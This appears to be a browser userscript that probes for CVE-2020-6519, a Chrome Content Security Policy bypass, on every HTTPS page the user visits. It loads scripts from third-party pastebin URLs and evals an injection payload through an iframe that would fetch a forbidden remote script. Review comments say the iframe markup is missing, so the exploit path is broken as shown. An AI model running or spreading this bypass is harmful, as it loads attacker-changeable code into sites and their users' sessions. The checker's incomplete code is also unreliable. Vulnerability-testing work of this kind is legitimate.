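// ==UserScript==
// @name         EXPLOIT-CVE-2020-6519
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       Gal Weizman (gal@perimeterx.com)
// @match        https://*/*
// @grant        none
// ==/UserScript==

// Proof-of-concept checker for CVE-2020-6519 (a Chrome CSP bypass; the version
// check below treats Chrome 73–83 as affected).
//
// NOTE(review): the header matches every HTTPS page, and when the bypass works the
// page ends up executing a script fetched from a third-party pastebin URL whose
// content can change at any time.  Narrow `@match` to hosts you are authorised to
// test and host the probe script yourself before running this outside a lab.

/**
 * The whole exploitability test.  check() serialises this function into an
 * inline <script> (so the copy that runs is subject to the page's CSP), which
 * is why it is fully self-contained and shares state through properties on
 * `top` rather than through closures.
 *
 * @param {boolean} fail - true when invoked directly as the fallback after the
 *   inline copy did not signal start (presumably blocked by CSP); in that mode
 *   the function only reports and performs no probe.
 */
const cve_entire_func = function (fail = false) {
  // Tells check() that the inline copy actually executed.
  top._CVE_START = true;

  // Banner element (`div`), hidden scratch element (`div2`) and the cached
  // result of the user-agent version check.
  let div;
  let div2;
  let isVulnerable;

  /**
   * Logs to the console and appends the same text as a list item to the
   * on-page banner.  `div` must already exist (init() creates it first).
   */
  function message (...args) {
    console.log ('CVE-2020-6519-exploit: ', ...args);
    const item = document.createElement ('li');
    item.innerText = args.join (' ');
    div.appendChild (item);
  }

  /**
   * Installs the banner stylesheet.  The element id `CVE_STYLE` is what the
   * payload callbacks later reach via `top.CVE_STYLE` (window named access),
   * so it must not change.
   */
  function css (color = 'greenyellow') {
    const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`;
    const style = document.createElement ('style');
    style.id = 'CVE_STYLE';
    style.textContent = content;
    document.head.appendChild (style);
  }

  /**
   * Attempts the bypass: evaluates `payload` in a child window so that it
   * injects a <script> from `top._CVE_URL` and reports via `top._xxx` /
   * `top._yyy` whether the fetch succeeded (bypass worked) or failed.
   */
  function exploit () {
    message ('start running exploit');
    // Exposed on `top` because the payload runs in another realm and cannot
    // see this function's locals.
    top._MESSAGE = message;
    top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ';
    top._xxx = () => {
      top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}";
      top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! 😥👎🏻😭");
    };
    top._yyy = () => {
      top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}";
      top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! 🥳👍🏻😁 (but this website's CSP is still not well configured though...)");
    };
    const payload = `
      top.SUCCESS = true;
      var s = document.createElement("script");
      s.src = top._CVE_URL;
      s.onload = top._xxx;
      s.onerror = top._yyy;
      document.body.appendChild(s);
    `;

    // NOTE(review): this appends an empty string, so no element is created
    // here and nothing in this listing defines `_XXX`; the markup that created
    // the iframe appears to have been lost in extraction — confirm against the
    // upstream PoC before relying on this script.
    div2.innerHTML += "";

    setTimeout (() => {
      // `top.SUCCESS` is only ever set by the payload itself, so this guard
      // only matters if something not visible here already ran it.
      if (top.SUCCESS) return;
      // Same window-named-property lookup as the original bare `_XXX`, but a
      // missing element is reported instead of throwing a ReferenceError.
      const frame = window._XXX;
      if (!frame || !frame.contentWindow) {
        message ('iframe _XXX not found - cannot evaluate payload');
        return;
      }
      // eval() of a locally built constant — deliberate for this PoC; never
      // feed it page-controlled input.
      frame.contentWindow.eval (payload);
    });

    setTimeout (() => {
      message ('in case exploitation succeeded - an alert message originated by the forbidden script should pop up');
      message ('finish testing exploitability');
    }, 500);
  }

  /** Shows the banner and runs the probe. */
  function start () {
    message ('start testing exploitability');
    document.body.prepend (div);
    document.body.prepend (div2);
    css ();
    exploit ();
  }

  /**
   * Heuristic: parses the `Chrome/<major>` user-agent token and flags majors
   * 73–83 as affected.  Informational only — nothing below gates on it — and
   * the UA can be spoofed, frozen, or reported by Chromium derivatives, so do
   * not treat it as proof either way.
   *
   * @returns {boolean|undefined} undefined when no `Chrome` token is present.
   */
  function getIsVulnerable () {
    if (isVulnerable !== undefined) return isVulnerable;
    const ua = navigator.userAgent;
    message ('User Agent: ', ua);
    const chromeToken = ua.split (' ').find ((part) => part.startsWith ('Chrome'));
    if (chromeToken) {
      const version = chromeToken.replace ('Chrome/', '').split ('.')[0];
      const major = Number.parseInt (version, 10);
      isVulnerable = major < 84 && major > 72;
      message (
        'Chrome',
        isVulnerable ? 'is' : 'is not',
        'vulnerable to CVE-2020-6519',
        isVulnerable ? '😥' : '😁',
        '(version', version, 'major)'
      );
    }
    return isVulnerable;
  }

  /**
   * Builds the banner elements, then either reports the fallback result
   * (`fail`), or first checks whether the page's CSP already lets an
   * arbitrary remote script load — if it does, the CVE is irrelevant and only
   * the CSP finding is reported; otherwise the probe is started.
   */
  function init () {
    div2 = document.createElement ('div');
    div2.id = 'b';
    div2.style.display = 'none';

    div = document.createElement ('div');
    div.id = 'a';
    div.setAttribute ('class', 'sticky');
    const heading = document.createElement ('b');
    heading.innerText = 'CVE-2020-6519-exploit: ';
    div.appendChild (heading);

    isVulnerable = getIsVulnerable ();

    if (fail) {
      document.body.prepend (div);
      document.body.prepend (div2);
      css ();
      // NOTE(review): reached when the inline copy never signalled start;
      // the remote script was not actually attempted in this path.
      message ('script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! 👏🏻🎉👏🏻🎉👏🏻');
      return;
    }

    // Baseline: if this third-party script loads, the CSP alone is the finding.
    const probe = document.createElement ('script');
    probe.src = 'https://pastebin.com/raw/95f4NkAL';
    probe.onload = () => {
      document.body.prepend (div);
      document.body.prepend (div2);
      css ('red');
      message ('this website is vulnerable due to poorley configured Content Security Policy');
      message ('therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it 🙄🙄🙄');
    };
    probe.onerror = () => {
      start ();
    };
    document.head.appendChild (probe);
  }

  init ();
};

/**
 * Entry point.  Injects cve_entire_func as an inline <script> so that it is
 * subject to the page's CSP; if that copy has not set `top._CVE_START` within
 * 1.5 s it is assumed blocked and the function is run directly in report mode.
 */
function check () {
  const inline = document.createElement ('script');
  inline.textContent = `(${cve_entire_func}())`;
  top._CVE_START = false;
  setTimeout (() => {
    // Fix: read the flag from `top`, where it is written.  The original read a
    // bare `_CVE_START`, which only resolves when this runs in the top window
    // and throws a ReferenceError in a same-origin frame.
    if (!top._CVE_START) cve_entire_func (true);
  }, 1500);
  document.head.appendChild (inline);
}

(function () {
  check ();
}) ();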